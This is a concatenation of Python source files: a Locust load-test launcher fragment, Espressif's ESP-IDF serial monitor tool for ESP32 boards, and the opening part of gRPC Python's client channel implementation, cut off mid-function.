"""
locustfile_path = 'locustfile.py'
template_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"templates",
"locustfile_template"
)
testcases = loader.load_testcases(testcase_file_path)
host = testcases[0].get("config", {}).get("request", {}).get("base_url", "")
with io.open(template_path, encoding='utf-8') as template:
with io.open(locustfile_path, 'w', encoding='utf-8') as locustfile:
template_content = template.read()
template_content = template_content.replace("$HOST", host)
template_content = template_content.replace("$TESTCASE_FILE", testcase_file_path)
locustfile.write(template_content)
return locustfile_path
def start_master(sys_argv):
sys_argv.append("--master")
sys.argv = sys_argv
main()
def start_slave(sys_argv):
if "--slave" not in sys_argv:
sys_argv.extend(["--slave"])
sys.argv = sys_argv
main()
def run_locusts_with_processes(sys_argv, processes_count):
processes = []
manager = multiprocessing.Manager()
for _ in range(processes_count):
p_slave = multiprocessing.Process(target=start_slave, args=(sys_argv,))
p_slave.daemon = True
p_slave.start()
processes.append(p_slave)
try:
if "--slave" in sys_argv:
[process.join() for process in processes]
else:
start_master(sys_argv)
except KeyboardInterrupt:
manager.shutdown()
|
idf_monitor.py | #!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make flash" (Ctrl-T Ctrl-F)
# - Run "make app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
# In testing mode the stdin is connected to PTY but is not used for input anything. For PTY
# the canceling by fcntl.ioctl isn't working and would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl, termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except:
pass
class LineMatcher:
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
socket_mode = serial_instance.port.startswith("socket://") # testing hook - data from serial can make exit the monitor
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace(b"\n", b"\r\n"),
"CR": lambda c: c.replace(b"\n", b"\r"),
"LF": lambda c: c.replace(b"\r", b"\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no futher data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
except SerialStopException:
pass
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.exit_key:
raise SerialStopException()
if self._output_enabled and (self._force_line_print or self._line_matcher.match(line)):
self.console.write_bytes(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But after some time when we didn't received it we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part)):
self._force_line_print = True;
if self._output_enabled:
self.console.write_bytes(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [ CTRL_H, 'h', 'H', '?' ]:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
elif c == CTRL_Y: # Toggle output display
self.output_toggle()
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
# to fast trigger pause without press menu key
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {make:7} Run 'make flash' to build & flash
--- {appmake:7} Run 'make app-flash to build & flash app
--- {output:7} Toggle output display
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
make=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
pause=key_description(CTRL_P),
)
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to run 'make flash'.
--- Press {} to run 'make app-flash'.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [ CTRL_F, CTRL_A ]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
yellow_print("Running make %s..." % target)
p = subprocess.Popen([self.make,
target ])
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
translation = subprocess.check_output(
["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr],
cwd=".")
if not "?? ??:0" in translation:
yellow_print(translation)
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(p) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
process = subprocess.Popen(["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file], cwd=".")
process.wait()
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output):
self.output = output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
for b in data:
l = len(self.matched)
if b == '\033': # ESC
self.matched = b
elif (l == 1 and b == '[') or (1 < l < 7):
self.matched += b
if self.matched == ANSI_NORMAL: # reset console
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
_channel.py | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import copy
import functools
import logging
import os
import sys
import threading
import time
import grpc
import grpc.experimental
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
# NOTE(rbellevi): No guarantees are given about the maintenance of this
# environment variable.
_DEFAULT_SINGLE_THREADED_UNARY_STREAM = os.getenv(
"GRPC_SINGLE_THREADED_UNARY_STREAM") is not None
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<{} of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<{} of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
try:
callback()
except Exception as e: # pylint: disable=broad-except
# NOTE(rbellevi): We suppress but log errors here so as not to
# kill the channel spin thread.
logging.error('Exception in callback %s: %s',
repr(callback.func), repr(e))
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
"""Consume a request iterator supplied by the user."""
def consume_request_iterator(): # pylint: disable=too-many-branches
# Iterate over the request iterator until it is exhausted or an error
# condition is encountered.
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
def _done():
return (state.code is not None or
cygrpc.OperationType.send_message
not in state.due)
_common.wait(state.condition.wait,
_done,
spin_cb=functools.partial(
cygrpc.block_if_fork_in_progress,
state))
if state.code is not None:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
def _rpc_state_string(class_name, rpc_state):
"""Calculates error string for RPC."""
with rpc_state.condition:
if rpc_state.code is None:
return '<{} object>'.format(class_name)
elif rpc_state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(class_name, rpc_state.code,
rpc_state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
class_name, rpc_state.code, rpc_state.details,
rpc_state.debug_error_string)
class _InactiveRpcError(grpc.RpcError, grpc.Call, grpc.Future):
"""An RPC error not tied to the execution of a particular RPC.
The RPC represented by the state object must not be in-progress or
cancelled.
Attributes:
_state: An instance of _RPCState.
"""
def __init__(self, state):
with state.condition:
self._state = _RPCState((), copy.deepcopy(state.initial_metadata),
copy.deepcopy(state.trailing_metadata),
state.code, copy.deepcopy(state.details))
self._state.response = copy.copy(state.response)
self._state.debug_error_string = copy.copy(state.debug_error_string)
def initial_metadata(self):
return self._state.initial_metadata
def trailing_metadata(self):
return self._state.trailing_metadata
def code(self):
return self._state.code
def details(self):
return _common.decode(self._state.details)
def debug_error_string(self):
return _common.decode(self._state.debug_error_string)
def _repr(self):
return _rpc_state_string(self.__class__.__name__, self._state)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def cancel(self):
"""See grpc.Future.cancel."""
return False
def cancelled(self):
"""See grpc.Future.cancelled."""
return False
def running(self):
"""See grpc.Future.running."""
return False
def done(self):
"""See grpc.Future.done."""
return True
def result(self, timeout=None): # pylint: disable=unused-argument
"""See grpc.Future.result."""
raise self
def exception(self, timeout=None): # pylint: disable=unused-argument
"""See grpc.Future.exception."""
return self
def traceback(self, timeout=None): # pylint: disable=unused-argument
"""See grpc.Future.traceback."""
try:
